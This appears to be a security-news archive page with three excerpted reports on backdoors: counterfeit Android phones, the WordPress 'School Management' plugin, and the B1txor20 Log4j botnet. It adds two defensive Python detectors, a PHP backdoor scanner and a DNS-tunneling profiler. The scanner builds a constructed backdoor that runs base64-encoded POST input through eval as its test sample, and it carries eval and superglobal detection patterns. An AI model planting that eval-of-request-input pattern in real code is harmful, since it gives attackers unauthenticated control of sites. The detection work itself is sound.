Tag Archive for: backdoor

Counterfeit Android Devices Revealed to Contain Backdoor Designed to Hack WhatsApp


A team of mobile security researchers has discovered backdoors in the system partition of some budget Android device models that are counterfeit versions of known brand-name models. 

The malware, which the Doctor Web team first discovered in July 2022, was found in at least four different smartphones: ‘P48pro’, ‘radmi note 8’, ‘Note30u’ and ‘Mate40’.

“These incidents are united by the fact that the attacked devices were copycats of famous brand-name models,” Doctor Web wrote. “Moreover, instead of having one of the latest OS versions installed on them with the corresponding information displayed in the device details (for example, Android 10), they had the long outdated 4.4.2 version.”

According to the security researchers, the trojans are aimed at executing arbitrary code inside the WhatsApp and WhatsApp Business messaging apps and could be used in a range of attack scenarios.

“Among them is the interception of chats and the theft of the confidential information that could be found in them; this malware can also execute spam campaigns and various scam schemes,” Doctor Web wrote.

From a technical standpoint, the security researchers said their antivirus detected changes in two different system objects.

“To download modules, [the malware] connects to one of several C&C (command-and-control) servers, sending a request with a certain array of technical data about the device. In response, the server sends a list of plugins that the trojan will download, decrypt and run,” Doctor Web explained.

The mobile antivirus provider warned that the new malicious apps could be a member of the Android.FakeUpdates trojan family, often used by malicious actors to infiltrate various system components, including firmware updating software, the default settings app or the component responsible for the system graphical interface. 

“To avoid the risk of becoming a victim of these and other malicious programs, Doctor Web recommends that users purchase mobile devices in official stores and from reputable distributors,” the company added. “Using an anti-virus and installing all available OS updates is also important.”

The advisory comes days after Google…

Source…

Maintaining Access | Penetration Testing



Backdoor baked into premium school management plugin for WordPress

Security researchers have discovered a backdoor in a premium WordPress plugin designed as a complete management solution for schools. The malicious code enables a threat actor to execute PHP code without authenticating.

The name of the plugin is “School Management,” published by Weblizar, and multiple versions before 9.9.7 were delivered with the backdoor baked into its code.

Although the latest version is clean, the developer failed to determine the source of the compromise.

The plugin allows schools to manage live classes, send email or SMS notifications, keep attendance boards and manage noticeboards, accept payments and issue invoices, manage exams, set up online lending libraries, and even manage transport vehicle fleets.

It is a complete solution that comes with an Android and iOS app to provide various access levels to users such as admins, teachers, accountants, students, parents, librarians, and receptionists.

PHP backdoor

Jetpack started to take a look at “School Management” (site not secure at the time of writing) after the WordPress.com support team reported finding malicious code in several sites using the plugin.

When looking at the lightly obfuscated code, Jetpack found a backdoor injected into the license-checking code of the plugin, which allows any attacker to execute PHP code.

The backdoor code after reversing obfuscation (Jetpack)

The backdoor can let an attacker access or alter the website’s contents, elevate privileges, and assume complete control of the site.

This is a critical security problem that is currently tracked as CVE-2022-1609, and received the maximum severity score of 10 out of 10.

Because the backdoor lives in the license-checking part of the plugin, the free version, which has no license check, does not carry the backdoor and is not affected.
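Sites that pull premium plugins straight from a vendor rarely diff each release, so a practical check is a small static scan that peels the common light obfuscations (base64, rot13, strrev) off string literals and flags any code path that evals decoded content or request input. The example below is added here and is not Jetpack's analysis or the School Management plugin's code: the backdoored license-check function, the `sm_check_license` name, the `lic` parameter and the base64 + strrev wrapping are all constructed to illustrate the pattern.

```python
import base64
import codecs
import re

# Constructed sample, not the School Management plugin's actual code: a
# hypothetical license-check function carrying an eval-of-request-input
# backdoor hidden behind base64 + strrev, beside a clean copy of the same
# function. The obfuscation style and the "lic" parameter are assumptions.
PAYLOAD = 'if(isset($_POST["lic"])){eval(base64_decode($_POST["lic"]));}'
ENCODED = base64.b64encode(PAYLOAD[::-1].encode()).decode()

CLEAN_PHP = '''<?php
function sm_check_license($key) {
    $r = wp_remote_get("https://example.invalid/verify?k=" . $key);
    return is_array($r);
}
'''
BACKDOORED_PHP = CLEAN_PHP.replace(
    "    return is_array($r);",
    f'    eval(strrev(base64_decode("{ENCODED}")));\n    return is_array($r);')

# eval/assert/create_function execute strings; the decoders are how light
# obfuscation hides the string; the superglobals are how an attacker feeds it.
EVAL = re.compile(r"\b(?:eval|assert|create_function)\s*\(")
DECODERS = re.compile(
    r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev|hex2bin)\s*\(")
SUPERGLOBALS = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b|php://input")
DQ = r'"[^"\\]*(?:\\.[^"\\]*)*"'      # double-quoted literal, escapes allowed
SQ = r"'[^'\\]*(?:\\.[^'\\]*)*'"      # single-quoted literal
STRING_LIT = re.compile(DQ + "|" + SQ)


def looks_like_php(text):
    return bool(EVAL.search(text) or SUPERGLOBALS.search(text))


def peel(literal, depth=3):
    """Undo up to `depth` layers of base64 / rot13 / strrev on a string
    literal and return the first layer that looks like PHP, else None."""
    if depth == 0 or not literal:
        return None
    layers = []
    try:
        layers.append(base64.b64decode(literal, validate=True).decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        pass                      # not valid base64 text; try the other transforms
    layers.append(codecs.decode(literal, "rot13"))
    layers.append(literal[::-1])
    for text in layers:
        if looks_like_php(text):
            return text
        inner = peel(text, depth - 1)
        if inner is not None:
            return inner
    return None


def classify(text):
    """Name the dangerous construct in one statement, or None."""
    has_eval = EVAL.search(text) is not None
    if has_eval and SUPERGLOBALS.search(text):
        return "eval of request input"
    if has_eval and DECODERS.search(text):
        return "eval of decoded literal"
    return None


def scan_php(source):
    """Return (line_number, reason) findings for one PHP file's text."""
    findings = []
    for number, line in enumerate(source.splitlines(), 1):
        reason = classify(line)
        if reason:
            findings.append((number, reason))
        for match in STRING_LIT.finditer(line):
            hidden = peel(match.group(0)[1:-1])   # strip the quotes
            if hidden is not None:
                findings.append((number, "hidden in literal: "
                                 + (classify(hidden) or "decodes to PHP")))
    return findings


if __name__ == "__main__":
    print("clean:", scan_php(CLEAN_PHP))
    print("backdoored:", scan_php(BACKDOORED_PHP))
```

Run against a real plugin directory by feeding each `.php` file's text to `scan_php`; the peeling step is what catches a payload that never appears as plain `eval($_POST...)` in the file. It is a heuristic, not a proof of absence: a backdoor that assembles its code from several variables, or that uses a transform outside the three handled here, will not trip it, and legitimate libraries sometimes base64 a blob for unrelated reasons, so every finding still needs a human read.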

Discovery and fixing

Jetpack initially assumed that the backdoor was a case of a nulled plugin: a premium plugin that has been cracked or modified (pirated) and distributed through third-party websites, often so that it works without a license.

However, after discussing with the site owners, the analysts learned that the plugin was sourced directly from the vendor, so the backdoor…

Source…

New Linux backdoor that propagates via Log4j vulnerability easy to exploit in the cloud


(“Java Logo” by mrjoro is licensed under CC BY-NC 2.0)

Researchers on Tuesday reported that a honeypot system had captured an unknown Linux file in the Executable and Linkable Format (ELF) propagating through a Log4j vulnerability.

In a blog post, 360Netlab researchers say that the network traffic generated by this sample triggered a DNS Tunnel alert in their system. The researchers investigated further and found a new botnet family, which they named B1txor20 based on its use of the file name “b1t,” the XOR algorithm, and an RC4 key length of 20 bytes.

The researchers said the new botnet is a backdoor for the Linux platform, a class of tool that is easy to deploy in cloud environments. B1txor20 can steal sensitive data, install rootkits, and create reverse shells, in which the compromised host initiates an outbound connection to the attacker rather than the attacker connecting in.

Seeing a new botnet family leveraging the Log4j vulnerability and DNS tunneling for communication is interesting, but not unexpected, said Mike Parkin, senior technical engineer at Vulcan Cyber. Parkin said malware authors are known for quickly developing new strains to leverage recent vulnerabilities and combining different techniques to try and avoid detection.

“Fortunately, DNS tunneling is relatively easy to detect and multiple tools exist that can disrupt an attacker’s use of DNS for command and control,” Parkin said. “It’s easy to deploy these tools in a cloud environment as well as on-premises, and some form of DNS protection should be considered a best practice. While that wouldn’t stop the initial infection, it would effectively contain the breach since the attacker won’t be able to control the victim system. This new botnet does reinforce the need to patch for the Log4J vulnerability, and make sure the organization has the tools and capabilities to manage this kind of risk in their environment.”
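The detection Parkin refers to rests on the shape of tunneled traffic: many distinct, long, high-entropy subdomains under one registered domain, often carrying TXT or NULL queries. The following is an added example, not code from 360Netlab's report or from this article: a per-domain profiler over a constructed query log, where the `c2.example.org` name and the base32 chunk labels are stand-ins rather than any real B1txor20 indicator, and the "last two labels" rule for the registered domain is a stated simplification.

```python
import base64
import hashlib
import math
from collections import defaultdict

# Constructed DNS query log, not captured traffic. Format: "client qname qtype".
# Five ordinary lookups, then eight lookups whose leftmost label carries a
# base32-encoded chunk, the shape a DNS tunnel produces. The domain is a
# placeholder, not a real B1txor20 C2.
TUNNEL_DOMAIN = "c2.example.org"


def _chunk(i):
    """Stand-in for one encoded exfil/C2 chunk (52 base32 chars)."""
    digest = hashlib.sha256(f"chunk{i}".encode()).digest()
    return base64.b32encode(digest).decode().rstrip("=").lower()


SAMPLE_LOG = [
    "10.0.0.5 www.example.com A",
    "10.0.0.5 mail.example.com A",
    "10.0.0.7 api.example.net A",
    "10.0.0.7 cdn.example.net A",
    "10.0.0.5 www.example.com A",
] + [f"10.0.0.9 {_chunk(i)}.{TUNNEL_DOMAIN} TXT" for i in range(8)]


def shannon_entropy(s):
    """Bits per character of the string; 0.0 for empty or single-symbol input."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (registered_domain, subdomain). Simplification: the last two
    labels are the registered domain; a public-suffix list is needed to
    handle names like example.co.uk correctly."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile_domains(log_lines):
    """Aggregate per registered domain: query count, unique subdomains,
    mean subdomain length, mean per-query entropy, TXT/NULL fraction."""
    stats = defaultdict(lambda: {"subs": set(), "lens": [], "ents": [], "txt": 0, "n": 0})
    for line in log_lines:
        _client, qname, qtype = line.split()
        domain, sub = split_name(qname)
        s = stats[domain]
        s["n"] += 1
        s["subs"].add(sub)
        s["lens"].append(len(sub))
        s["ents"].append(shannon_entropy(sub.replace(".", "")))
        if qtype in ("TXT", "NULL"):
            s["txt"] += 1
    return {
        domain: {
            "queries": s["n"],
            "unique_subdomains": len(s["subs"]),
            "mean_sub_len": sum(s["lens"]) / s["n"],
            "mean_entropy": sum(s["ents"]) / s["n"],
            "txt_fraction": s["txt"] / s["n"],
        }
        for domain, s in stats.items()
    }


def flag_tunnels(log_lines, min_unique=6, min_len=30, min_entropy=3.5):
    """Registered domains whose query pattern looks like tunneling. The
    thresholds are starting points to tune against a site's own baseline."""
    return sorted(
        domain for domain, f in profile_domains(log_lines).items()
        if f["unique_subdomains"] >= min_unique
        and f["mean_sub_len"] >= min_len
        and f["mean_entropy"] >= min_entropy
    )


if __name__ == "__main__":
    for domain, features in profile_domains(SAMPLE_LOG).items():
        print(domain, features)
    print("flagged:", flag_tunnels(SAMPLE_LOG))
```

The three conditions must all hold, because each one alone is noisy: CDNs and some security products legitimately emit many long hashed subdomains, so in production this heuristic belongs behind an allowlist of known high-cardinality domains and beside the rate-based signal (queries per minute to one domain) that a resolver log also gives you. As Parkin notes, none of this stops the Log4j exploitation itself; it removes the attacker's control channel once the host is compromised.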

This is a pretty thoughtfully designed piece of malware, said Casey Ellis, founder and CTO at Bugcrowd. Ellis said B1txor20 seems like it has been tailored towards targeting vulnerable Log4J instances inside Linux data centers which have otherwise been hardened.

“Limiting outbound connections is one of the key mitigations for Log4Shell, but…

Source…